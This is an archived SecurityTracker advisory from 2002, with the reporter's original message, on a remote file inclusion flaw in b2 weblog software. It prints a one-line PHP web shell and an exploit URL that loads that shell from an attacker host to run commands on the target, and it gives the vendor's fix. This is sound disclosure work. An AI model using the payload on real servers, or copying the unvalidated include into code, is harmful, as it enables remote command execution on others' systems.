SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   b2 Vendors:   Valdrighi, Michel
b2 Weblog Software Uses Relative Include Path That Allows Remote Users to Execute Arbitrary Shell Commands on the System
SecurityTracker Alert ID:  1004223
SecurityTracker URL:  http://securitytracker.com/id/1004223
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 7 2002
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): b2 0.6pre2 and prior versions
Description:   A vulnerability was reported in the 'b2' news forum software. A remote user can execute arbitrary commands on the system with the privileges of the web server.

It is reported that the /b2-include/b2edit.showposts.php script uses a relative definition for the b2functions.php include statement. Because of this, a remote usre can define an alternate path for b2functions.php, including one on a remote server. The file can contain malicious code, such as:

<?
system($cmd);
?>

The author of the report notes that the malicious file on the remote user's malicious server must be rendered by the remote server as text, not as PHP.

The following demonstration exploit URL that will execute the 'ls' command on the target host is provided:

http://[targethost]/b2/b2-include/b2edit.showposts.php?b2inc=http://[malicioushost]&cmd=ls

Impact:   A remote user can execute arbitrary shell commands on the server with the privileges of the web server.
Solution:   The vendor has described the following fix:

Create a file named b2config.php and upload it in your b2-include folder. According to the vendor, the file can be blank or be a copy of your original b2config.php file, it apparently doesn't matter.

Vendor URL:  www.cafelog.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  b2 php remote command execution




Site: www.cafelog.com
Vulnerable:

b2 0.6pre2 and earlier.

B2 is a php script which allows webmasters to quikly post 
news on the frontpage and let viewers interact with 
eachother. A bug exists in the scripts which allows an 
attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php
 
*snippet*
 
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
 
*snippet*
 
But since b2config.php does not exist inside the directory, 
an attacker can define $b2inc himself.
So if the attacker creates a file on his server, for 
example www.attacker.com , called b2functions.php, and he 
writes the following in it :
 
<? 
system($cmd);
?>
 
(note : the attacker's server must not be able to run php, 
it has to open the file as text)
 
he can include the file like this :
 
http://www.vulnerablehost.com/b2/b2-
include/b2edit.showposts.php?b2inc=http://www.attacker.com&c
md=ls
 
This would execute the ls command on vulnerablehost.com.

Fix:
Copy b2config.php into the b2-include directory

The vendor has been warned, and already released the same 
fix a few days earlier. 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC